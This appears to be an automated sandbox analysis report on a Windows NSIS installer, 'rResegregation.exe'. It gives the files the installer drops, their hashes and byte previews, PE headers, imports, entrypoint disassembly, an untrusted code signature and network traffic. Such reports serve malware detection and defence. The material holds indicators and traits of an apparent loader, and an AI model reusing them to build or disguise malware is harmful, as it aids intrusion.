                                                                Preview:............CCC.11.....................(((...dd..................j.G.H..........U..........................PP......A.............M.aa.....M................zzzz.7.---..........................ss..............D.x...i....................................... ......||..5.C.=..Q.....HHHH........aaaa...................................Z..........................E...TT................222..WWW.............zzz.........ggg.....................EE..........%%.I...((.....----.................7777....hh............222..3.>>>...........x.....4444.b..w...((.Y......:.........kk.....o.................................].................++.................{..dd.@@@....-...J.....+.bbb........?.?...z.G....Y......II.%..............................T....".d..8..........:..............."""............@............................K..66....M................'..........V..........=............................!........<<<..........--.m......\..................**...........................................zz..............

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Vizircraft\Harpers.Age

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):257451
                                                                Entropy (8bit):7.758028959639775
                                                                Encrypted:false
                                                                SSDEEP:6144:ykVsh9jrdzuQQjMCzdRXf/aND4iWy7b1m7GKa:ykVsL1upZRX6ND4iWGbMGb
                                                                MD5:E2D0B0BB949F6FF591455CE0A248948D
                                                                SHA1:780ED85EED3C9F495D10B180073FF91304D4E647
                                                                SHA-256:8AFD5755EB6C2A8FA05A0D40B27AF2E4231F09F6176ED9382CBB1DA76B0AEB78
                                                                SHA-512:39F7C6B6950F09D201F73804AC2C14B132228F0BC0A742A29A7FC9E21E92D3C36009E9FBBDB76CAF5F21680C328EC940705DCC5818B6B9A870D04D49617D142B
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...oo.1.===...QQ......p...............[[[......Y.........22..............;;;.&&&&....KKKKK...||||||........|..*D..............................................................................................................................n..A......................................................................c..^~7.D&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&..p_.f......V..1K.....................................................................................f.q.....DJ.._TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT..f......o..P.zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz..^@%.f.i.....X.$1....................................................................................f......ST.1SCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC......o3Ge5..................................................................................

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Vizircraft\heiling.rep

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):144434
                                                                Entropy (8bit):4.930322413705722
                                                                Encrypted:false
                                                                SSDEEP:3072:7W6ttdRhkvhbiQ+6LxUwih5Nd9PAhUekxpRkDFm8:5h+hf+6G3Nje2pIm8
                                                                MD5:6E6697CCC2A5B888E8D13D4BD3027FA6
                                                                SHA1:6BF4017D1016825F65A2001982DA632CCEBE8595
                                                                SHA-256:6DC937B66FF9E32AD262C966081BF7A1AA38A759491BE863E7AE2E28CC5DA611
                                                                SHA-512:6540116A7E70F21FE601A7E69DF7EF491678C853B7163CC265E74D1D02791EA8091BE467B33892F157B33DFC136D6CE9D8D982BF040DB54452127E40A37505F5
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:F.L.........k..B.=.........9........r...8..CF.........X....4I.......x.................U...........!......F...g....... ...$......n...r.....fz..\.l........Q......v.+.)..?..5...t../g.......U^9..&.Y......wS{.......V...;d.........{ -......_.J.......J.......,...w.....#.C.......>.Tn................'......Z...s....v........f......n..1...9uV...\+..W....N..~...@GI......].KU/.4RS...P...`......!.x.......9........Gh........%p......w.1. ..`.E\r..i................o..L..z'..........Y......rK..<.......crq$..........\...I............t.....g...6J.r.Q.{.K............U.)...~.. ........j..D$...>...........|........a......w...q............2`......W....%hC.=z[...q......f.a.%....w...$.......;..O..............|..a........ ....l......0......E|...?*?......j.)S...............~..-.....h........$.L........v........*............z........../.....................+..-...8#...................................IA...............[.................3..~....t.........H...u..... C.......V.....k......l.......tK.T^...

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Vizircraft\merrill.txt

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:ASCII text, with very long lines (342), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):409
                                                                Entropy (8bit):4.316596138966152
                                                                Encrypted:false
                                                                SSDEEP:12:uILfzwCbnN4VsFdzvO/cWJV9Cu/LkozsjsGgCu6:jLEkLR4VmozqngCu6
                                                                MD5:37FADD78CA1A16ACBA1C7C6E63B41790
                                                                SHA1:86D7AC5B3B31FD34C742F97314774C3A8278C5C7
                                                                SHA-256:4938F4211BF8BBA63BBA27B4A2490731AB3E56BC39C4B0997AE27148CB0B10EA
                                                                SHA-512:064537F2C3C471B4439141CBBAB01F3D7423C51DBCCD51C848612857E4532156EC037E4F2AA76A5D5C16D62EBB51C2C63A5614DD323F4639A9084C1CE9BE8092
                                                                Malicious:false
                                                                Preview:vankelmodig egernsund topectomy.tamanaca middlemost phellogen vandskadens soelvskrin plumbaginaceous unpartiality,coddled ableeze gerodermia rvrdiges sukkerlager kvarter.abdullahs kahili producent glike statsfinanserne.selskabsdamers topprisers desegmented tumors dominations paakaldt majkattens brickset drberceller waterboard staaltraadsnet..milliares sydsol exoner surgicotherapy recodifying myggesvrmene..

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Vizircraft\mf.fys

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):197401
                                                                Entropy (8bit):4.943394286855981
                                                                Encrypted:false
                                                                SSDEEP:3072:bkRORodlog6aK0ph0cXf2s/X8BT2vHWt8HSJrUBT0Bg5yLbbubc+OGjK3Eqm:b9oIg6qh02+suT2e5rxgs36HOGjKUqm
                                                                MD5:92741A228B38BD3240CB74D7337AB2B2
                                                                SHA1:56A25F8CB6DF0EBD46F8423B41132D6826EE67E7
                                                                SHA-256:FF913C2B04E11520A2D153E25C305E72984A33CAD0649CF94FC9498862916B2C
                                                                SHA-512:0AD99DAD1D5486B23C425687EFF0902A6F5D8447CC9FB6F03B01AA7AF3F931C4B8E5963D4ABBB9FEDDA5C5809C8E615CE3A93A4132427EAE85912CCDB7491267
                                                                Malicious:false
                                                                Preview:...c.I..md......i....]........1.,o.d;...L.....#...N...T...}..........a..h.......&.D..........M.]i.T..^p....G.......q.......................S.....}..*..."".;...-.......Y....Z....y..6.|.'..4P...............Y?.(j..b.a....0T.....s....a+....#.......h........EN.U..8..........z.........R..Y)...h........xo...........~.....7....o............o.VuG..W.P\.........C.d.3..........jv..qq.?.!......................u*.....6_....... .............m......../...af.......0......{.j.$.....^.g...........#............H...........0..'..p;..................7.......h...\.4n..........<.n...?........u......|J.g.L....}g.......K.......p.........y..........AT....LF........+fc...'z....._............q.y...........]b...*...c...............}....&...$................r...................P..........>....<............q.)..........o............^..........x....?...&~.........................@..E..q......z......EC;J.5......a.p.i........@...........4!.......V.......j..<.I.......qX......e..A.C........V.....................

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre\unpopularised.fas

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):177692
                                                                Entropy (8bit):4.929126718267887
                                                                Encrypted:false
                                                                SSDEEP:3072:/skvPxa7Rsl3OWreA7lX6/pKJ4Vo/pgUkiCF2nO9I3I5csbyU3e:/skv07Rm35fJEoBLd9O9fcsbTO
                                                                MD5:9A7DED13A5C6C7444E8C563C0621D5BC
                                                                SHA1:8698D3FC40852CC4CDAB3FE885225671895A94FA
                                                                SHA-256:D3EABF84D1FFA658F1ACF8E61875B210839C3242AC5478FECE8E910BC979BB64
                                                                SHA-512:91511DDF50C2E523BCA064793338A47CC3AFBEDE69274CB5F34F5195E81D416C23CC22686FC5AE63A2159ED577B3F5CC127C5CB918E5CFB63D378B2BF9E38E56
                                                                Malicious:false
                                                                Preview:...R. ...................Y....xB....7..=...........L..k..?....h.......[......................^......5......................H......$.....4p.-_V.....}.Pt..H.Z.............}...g....2.....Mo_.......^.....EJ.B...1....................K..t2..6..X....................9..........-...........t...M..f.........!.........x.u...~...-.2..tr..........\............X... ..........W..Y.....w.......1......d............#.......?....;........:......+../.y....%...m.....H......{.........................<...............................3 ...@.....#...........\.....&..............n...J.N...4-... ........N.....y..g..........................-3.[...................!.........?y.V.q..k....B.........`(.4.........G6.....5...........:........*......................v.f....e.A..........y......m....7....T...&..&...z.=...(.......!....z...,.c....F......E................w..........u,....;.p.............zn.....(.....]...~..........M[..2..B.....I.a..8....]Y........P..<....x.,....../...........>....E...S...C.q..

                                                                C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11264
                                                                Entropy (8bit):5.770803561213006
                                                                Encrypted:false
                                                                SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                                                MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                                                SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                                                SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                                                SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: W1nnerFree CS2.exe, Detection: malicious, Browse
                                                                • Filename: WP.exe, Detection: malicious, Browse
                                                                • Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious, Browse
                                                                • Filename: TIjRtMJfZA.exe, Detection: malicious, Browse
                                                                • Filename: TIjRtMJfZA.exe, Detection: malicious, Browse
                                                                • Filename: Request_for_Pricelist_confirmation.xls, Detection: malicious, Browse
                                                                • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious, Browse
                                                                • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6656
                                                                Entropy (8bit):4.994861218233575
                                                                Encrypted:false
                                                                SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                                MD5:B648C78981C02C434D6A04D4422A6198
                                                                SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                                SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                                SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: INNORIX-Agent.exe, Detection: malicious, Browse
                                                                • Filename: INNORIX-Agent.exe, Detection: malicious, Browse
                                                                • Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious, Browse
                                                                • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious, Browse
                                                                • Filename: bPYR660y5o.exe, Detection: malicious, Browse
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious, Browse
                                                                • Filename: R7MPO3ijgz.exe, Detection: malicious, Browse
                                                                • Filename: tNET06vnWS.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\hotdoggen.ini

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):50
                                                                Entropy (8bit):4.351272380112911
                                                                Encrypted:false
                                                                SSDEEP:3:Y0e4nxwKOAXXXUT23:ZxGQUTg
                                                                MD5:70345464BA62A9453DB2F24C1BC10881
                                                                SHA1:62FE4814D1B6082B46C196734B9EAF33B9B691BB
                                                                SHA-256:CC7E912D757A17A09CED10401C69D122B7972D4F9F6E26705E18A8CFE3EBEF40
                                                                SHA-512:B0ED1640898EBF66797489862BE3ACDFF589B161106C688E0536CABD91F673A75126A70B9363B078D8C88144D547DED4E8980E457C8E75E1477AADBB5414AE3A
                                                                Malicious:false
                                                                Preview:[flgevirkningerne]..Blokeringsfrit250=Svaleskabs..

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.657818049367574
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:rResegregation.exe
                                                                File size:883'592 bytes
                                                                MD5:b64f1f87fdc7e8bd3d053d058fc08f4e
                                                                SHA1:c3ef7dfe21793f4c98a0b98fa0d8e9b4a00a884c
                                                                SHA256:92437485dda44372ed6d0baa2e1ff1593e0d43e5c6ef20918a393d83153a1a94
                                                                SHA512:d3962f5a5c312addfb5649ac1af87b9f9d58439995ae1392cb7ec142b2591dbab370fb0b4897dad748bb4575cfbe63bb93f35c74642ae0e467b3a0453bfd151b
                                                                SSDEEP:12288:uJTQf8fr0Lblkgj88AXVLzmmbj01qfuhheB0GKc2XUJW+QiAukU30+9Ir/CSQf:CTQfgWkk8RRg1qI4qs0Uk+T/G/CJ
                                                                TLSH:DA1512476B95DD57C2A3127489E1E37BA738CEC00D2986435BC02D99BCB2F9E3D8619C
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....

                                                                File Icon

                                                                Icon Hash:4dcdeced7d5d5823

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4030ec
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:E=jagtkontrollens@Kilokalorie.Fib, O=Stallard, OU="Switchbacker Afgangshaller ", CN=Stallard, L=W\xfcrzburg, S=Bayern, C=DE
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 21/01/2024 08:52:39 20/01/2027 08:52:39
                                                                Subject Chain
                                                                • E=jagtkontrollens@Kilokalorie.Fib, O=Stallard, OU="Switchbacker Afgangshaller ", CN=Stallard, L=W\xfcrzburg, S=Bayern, C=DE
                                                                Version:3
                                                                Thumbprint MD5:287B0A10F105EE71A5C0E982BEB5171A
                                                                Thumbprint SHA-1:3C368F2787B907BFA45876449519EEDD2415F859
                                                                Thumbprint SHA-256:ABDEE1435836624C8D806F1D945CCF02FCC2C3529BC3DDC8CF16EC9F47DF13D4
                                                                Serial:582F2139CDE90FD138B7758EA47067A0D1B679C3

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 00000184h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+18h], ebx
                                                                mov dword ptr [esp+10h], 00409198h
                                                                mov dword ptr [esp+20h], ebx
                                                                mov byte ptr [esp+14h], 00000020h
                                                                call dword ptr [004070A8h]
                                                                call dword ptr [004070A4h]
                                                                cmp ax, 00000006h
                                                                je 00007F757CCD0CA3h
                                                                push ebx
                                                                call 00007F757CCD3C11h
                                                                cmp eax, ebx
                                                                je 00007F757CCD0C99h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 00407298h
                                                                push esi
                                                                call 00007F757CCD3B8Dh
                                                                push esi
                                                                call dword ptr [004070A0h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], bl
                                                                jne 00007F757CCD0C7Dh
                                                                push ebp
                                                                push 00000009h
                                                                call 00007F757CCD3BE4h
                                                                push 00000007h
                                                                call 00007F757CCD3BDDh
                                                                mov dword ptr [007A1F44h], eax
                                                                call dword ptr [00407044h]
                                                                push ebx
                                                                call dword ptr [00407288h]
                                                                mov dword ptr [007A1FF8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+38h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 0079D500h
                                                                call dword ptr [00407174h]
                                                                push 00409188h
                                                                push 007A1740h
                                                                call 00007F757CCD3807h
                                                                call dword ptr [0040709Ch]
                                                                mov ebp, 007A8000h
                                                                push eax
                                                                push ebp
                                                                call 00007F757CCD37F5h
                                                                push ebx
                                                                call dword ptr [00407154h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c00000x2b038.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd60900x1af8.data
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x5db60x5e00f367801e476b699be2b532039e0b583cFalse0.6806848404255319data6.508470969322742IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x90000x3990380x40029ebcbec0bd7bd0fecb3d2937195c560unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x3a30000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x3c00000x2b0380x2b2009778d093a419153a5e6a05c46a1f4faaFalse0.38580729166666666data4.808486494968782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x3c04480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3347480184549864
                                                                RT_ICON0x3d0c700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4008040782005466
                                                                RT_ICON0x3da1180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.41899260628465806
                                                                RT_ICON0x3df5a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40257439773264053
                                                                RT_ICON0x3e37c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.45643153526970953
                                                                RT_ICON0x3e5d700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4978893058161351
                                                                RT_ICON0x3e6e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5407782515991472
                                                                RT_ICON0x3e7cc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5545081967213115
                                                                RT_ICON0x3e86480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5424187725631769
                                                                RT_ICON0x3e8ef00x748Device independent bitmap graphic, 24 x 48 x 24, image size 1824EnglishUnited States0.5359442060085837
                                                                RT_ICON0x3e96380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.4925115207373272
                                                                RT_ICON0x3e9d000x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.3627167630057804
                                                                RT_ICON0x3ea2680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                                RT_DIALOG0x3ea6d00x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x3ea7d00x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x3ea8f00xc4dataEnglishUnited States0.5918367346938775
                                                                RT_DIALOG0x3ea9b80x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x3eaa180xbcdataEnglishUnited States0.648936170212766
                                                                RT_VERSION0x3eaad80x21cdataEnglishUnited States0.5203703703703704
                                                                RT_MANIFEST0x3eacf80x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Feb 28, 2024 13:26:21.495882034 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:21.495980024 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:21.496260881 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:21.519282103 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:21.519345999 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:21.882086992 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:21.882283926 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:21.884493113 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:21.884715080 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.004153013 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.004256010 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.005426884 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.005614996 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.011009932 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.052685022 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.222208023 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.222417116 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.222484112 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.222553015 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.222657919 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.222703934 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.223984003 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.224044085 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.438023090 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438057899 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.438277006 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438455105 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438472986 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.769718885 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.769992113 CET50223443192.168.11.20142.250.72.225
